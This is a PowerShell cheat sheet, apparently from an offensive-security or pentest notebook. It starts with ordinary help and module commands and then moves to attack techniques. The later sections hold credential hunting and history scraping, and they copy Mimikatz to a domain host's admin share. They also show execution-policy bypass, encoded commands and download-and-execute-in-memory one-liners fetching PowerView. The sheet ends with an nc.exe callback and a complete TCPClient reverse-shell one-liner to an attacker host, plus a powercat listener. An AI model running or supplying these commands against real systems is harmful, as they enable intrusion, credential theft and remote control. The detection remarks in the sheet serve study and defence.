Powershell Fu

  • -Full : shows the complete help for a topic (syntax, every parameter, examples)

  • -Examples : shows only the usage examples for a cmdlet (these two Get-Help switches are in different parameter sets and cannot be combined in one call)

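# PowerShell help. 'help' is a wrapper around Get-Help that pages its output.
help *keyword*
powershell /?
powershell -?
powershell -Help
Get-Help *

# List every help topic whose name contains the word "process".
# Wildcards do this; the original's parentheses are not a wildcard syntax.
Get-Help *process*

# Full help for one cmdlet. -Full and -Examples are different parameter sets: use one or the other.
Get-Help Get-Process -Full
Get-Help Get-Process -Examples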

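# List all cmdlets
Get-Command -CommandType Cmdlet
# Cmdlets: list every property of each one.
# (The original piped Get-ChildItem, which lists the current directory, not cmdlets.)
Get-Command -CommandType Cmdlet | Format-List *

# Distinct process names, sorted. Pull the name out first so -Unique de-duplicates on the
# name rather than on the whole Process object.
Get-Process | Select-Object -ExpandProperty ProcessName | Sort-Object -Unique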

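# Default module directories, one per line (';' on Windows, ':' elsewhere)
$env:PSModulePath -split [IO.Path]::PathSeparator

# List all WMI classes. (The original listed Win32_Volume *instances*, not the class list.)
Get-WmiObject -List
# Get-WmiObject is deprecated and absent from PowerShell 7; the CIM equivalents:
Get-CimClass                            # all classes in root\cimv2
Get-CimInstance -ClassName Win32_Volume # instances of one class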

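# Get the aliases that resolve to a cmdlet (e.g. gci, ls, dir -> Get-ChildItem)
Get-Alias -Definition Get-ChildItem

# Update the local help content. Typically needs an elevated session and internet access;
# on an offline host run Save-Help on a connected machine and point Update-Help -SourcePath at it.
Update-Help

# Explore the registry: HKLM: and HKCU: are drives exposed by the Registry provider
cd HKLM:\
Get-ChildItem HKLM:\SOFTWARE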

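# Scouring for files (credential hunting).
# -Pattern is a regex: 'pass*' means "pas" followed by zero or more "s", so just use 'pass'
# (or add -SimpleMatch for a literal string). Avoid hard-coding a user profile path.
Select-String -Path "$env:USERPROFILE\*.txt" -Pattern 'pass'

# Find files by name under a folder. Set the variables first; -File skips directories and
# -ErrorAction SilentlyContinue hides access-denied noise instead of aborting the walk.
$searchinfolder = 'C:\'
$filename = '*.txt'
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse -File -ErrorAction SilentlyContinue |
    Select-Object -ExpandProperty FullName

# Open files
Get-Content -Path "File name.txt"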

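# Copy a file to a remote host over the C$ admin share. Needs local-admin rights on the target
# and SMB reachability; quote the whole UNC path rather than only the 'Program Files' part.
# If file-share object-access auditing is enabled on the target, the write is logged there.
Copy-Item -Path .\Invoke-MimikatzEx.ps1 -Destination "\\dcorpadminsrv.dollarcorp.moneycorp.local\c$\Program Files"

# Hide the PowerShell window while a script runs. The console may still flash briefly at
# launch, and -WindowStyle Hidden on the command line is a common hunting indicator.
powershell.exe -WindowStyle Hidden -File .\script1.ps1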

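# Add a user to a domain group (ActiveDirectory module / RSAT required;
# -Identity takes a sAMAccountName, DN, SID or GUID)
Add-ADGroupMember -Identity <Group> -Members <User>

# Remove a user from a domain group
Remove-ADGroupMember -Identity <Group> -Members <User>

# Remove a user from a *local* group. Remove-LocalGroupMember has no -Identity parameter
# (the original would error); it takes -Group and -Member. Built-in LocalAccounts module,
# Windows PowerShell 5.1+ on Windows.
Remove-LocalGroupMember -Group <Group> -Member <User>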

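# Import a module from a path (or by name if it lives on $env:PSModulePath)
Import-Module <modulepath>

# List all commands in a module
Get-Command -Module <modulename>
# Search commands by keyword. -Name matches the whole name, so 'Firewall' alone finds nothing;
# wrap it in wildcards, or match on the noun part of the Verb-Noun name.
Get-Command -Name *Firewall*
Get-Command -Noun *Firewall*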

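# View truncated output: widen the line so Format-* does not trim columns
<Command> | Out-String -Width 500
# Out-String joins everything into ONE string by default; -Stream emits one string per line
# (the original had these the wrong way round and carried a stray leading '-')
<Command> | Out-String
<Command> | Out-String -Stream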

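# Path where the console history is persisted by PSReadLine (Windows PowerShell 5.1 / PowerShell 7).
# Default on Windows: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Worth checking for credentials typed on the command line; note that wiping it is itself noticeable.
(Get-PSReadLineOption).HistorySavePath
Get-History     # in-memory history of the current session only

# Start-menu shortcut directory. PowerShell does not expand %appdata%; use $env:APPDATA.
"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Windows PowerShell"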

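# Run PowerShell with the execution policy bypassed for this process only (-ep = -ExecutionPolicy).
# Execution policy is not a security boundary; this just skips the script-signing check.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass

# Check whether the current PowerShell process is 32-bit or 64-bit
[Environment]::Is64BitProcess   # $true in a 64-bit process
[IntPtr]::Size                  # 8 = 64-bit, 4 = 32-bit

# From a 32-bit process on 64-bit Windows, launch the 64-bit PowerShell.
# 'sysnative' is a WOW64 redirection alias that only exists for 32-bit callers;
# from a 64-bit process it does not resolve, so use System32 there.
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass

# On a 64-bit system, run PowerShell as a 32-bit process (for tools/DLLs that need a bitness match)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass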

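# Base64-encode a script for -EncodedCommand. powershell.exe expects UTF-16LE (Unicode), not UTF-8,
# so the same encoding must be used on both sides. -Raw makes Get-Content return one string
# instead of an array (FromBase64String on an array fails).
$script = Get-Content -Path "File_to_be_encoded" -Raw
$enccommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))

# Decode it again (the original labelled this step "encode" but only decoded)
$DecodedText = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enccommand))

# Base64-encode an arbitrary binary file, e.g. to move it over a text-only channel
$EncodedFile = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\file"))

# Execute a Base64-encoded command (-EncodedCommand / -enc). The payload is trivially decodable,
# and -enc on the command line is a common hunting indicator in process-creation logs.
powershell -EncodedCommand $enccommand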

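# Download files. -UseBasicParsing skips the Internet Explorer DOM parser, which fails on hosts
# where IE is absent or its first-run setup never completed.
Invoke-WebRequest -Uri "http://<IP>/PowerView.ps1" -OutFile "PowerView.ps1" -UseBasicParsing
powershell "(New-Object Net.WebClient).DownloadFile('http://<IP>/jp.exe','jp.exe')"
# Older Windows PowerShell builds may not offer TLS 1.2 to an HTTPS server; enable it first:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Download & execute in memory. Nothing is written to disk, but the script text is still
# visible to Script Block Logging and AMSI. Quote the whole command so that, if the parent
# is itself PowerShell, the parentheses and ';' are not evaluated there. (The original line was
# mangled by a run of whitespace and a dangling 'Find-AllVulns"'.)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/script.ps1'); Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)

# Execute commands / script blocks
powershell.exe -Command "& {Get-EventLog -LogName Security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"    # -c is short for -Command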

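# Unzip files
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip {
    param([string]$zipfile, [string]$outpath)
    # .NET resolves relative paths against the process working directory, which is NOT
    # PowerShell's $PWD, so turn both arguments into absolute provider paths first.
    $zipfile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($zipfile)
    $outpath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($outpath)
    # Throws if a file in the archive already exists under $outpath. Only unpack archives you
    # trust: entry names containing '..' can escape $outpath (zip-slip) on .NET versions that
    # do not validate them.
    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
Unzip "C:\a.zip" "C:\a"
# PowerShell 5+ ships an equivalent cmdlet: Expand-Archive -Path C:\a.zip -DestinationPath C:\a
# If Add-Type -AssemblyName fails (assembly not resolvable), load it from the reference assemblies:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"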
  • Using functions: paste or dot-source the function definition into the session first, then call it like any cmdlet (as in the Unzip example above).

Log in as another user with PowerShell (PSRemoting)

  • Requires: a username and its cleartext password. PSCredential does not do pass-the-hash: the hash-looking value in the example only works if that string is the account's actual password. With only an NTLM hash you need to crack it or use a pass-the-hash tool instead.

  • Shell access on the box (e.g. a netcat shell). Enter-PSSession is interactive and typically does not work from such a shell; use Invoke-Command -ScriptBlock there.

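# Build a credential object from a cleartext password. PSCredential cannot authenticate with
# a hash, so the value below is used as the password string itself.
$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
# Interactive remoting session: needs WinRM enabled on the target and an interactive host,
# so it typically does not work from a netcat shell.
Enter-PSSession -ComputerName localhost -Credential $credential
# Non-interactive alternative that works from a netcat shell:
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock { whoami }

# To get a new shell as Administrator, have the remote session call back to your listener.
# nc needs both <host> and <port>; the original omitted the listener address.
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {
    cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe <ATTACKER_IP> 41337 -e cmd.exe"
}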

Reverse Shells

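# Download and execute in memory. Quote the whole command so that, if the parent process is
# itself PowerShell, the parentheses and ';' are passed to the child instead of being evaluated
# by the parent. The original omitted the value for -IPAddress (the listener address).
powershell "iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER_IP> -Port 9001"
powershell.exe -c "iex ((New-Object Net.WebClient).DownloadString('http://<IP>/PowerView.ps1')); Find-LocalAdminAccess"
powershell.exe -c "iex (iwr http://<IP>/File.ps1 -UseBasicParsing); Invoke-AllChecks"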

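# One-liner reverse shell. Connects OUT to <ATTACKER_IP>:45000 (the original left the address
# empty), reads commands into a 64 KB buffer, runs each with iex (stderr merged via 2>&1) and
# writes the output back with a 'PS path> ' prompt. Traffic is plaintext TCP with no
# authentication, and the command text is captured by Script Block Logging where enabled.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"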


# Listener side with powercat (a PowerShell netcat). Dot-source the script to load the
# function, then listen: -l listen, -v verbose, -p port, -t timeout in seconds.
# Port 443 blends in with HTTPS on the wire, but the session itself is still plaintext.
. .\powercat.ps1
powercat -l -v -p 443 -t 1000
